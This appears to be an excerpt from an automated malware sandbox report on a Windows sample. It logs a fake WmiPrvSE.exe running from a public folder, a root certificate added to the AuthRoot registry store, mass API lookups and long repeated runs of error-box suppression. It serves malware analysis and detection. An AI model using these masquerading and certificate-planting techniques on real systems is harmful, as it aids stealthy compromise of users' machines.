Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_007801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

23_2_007801A8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 Blob

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
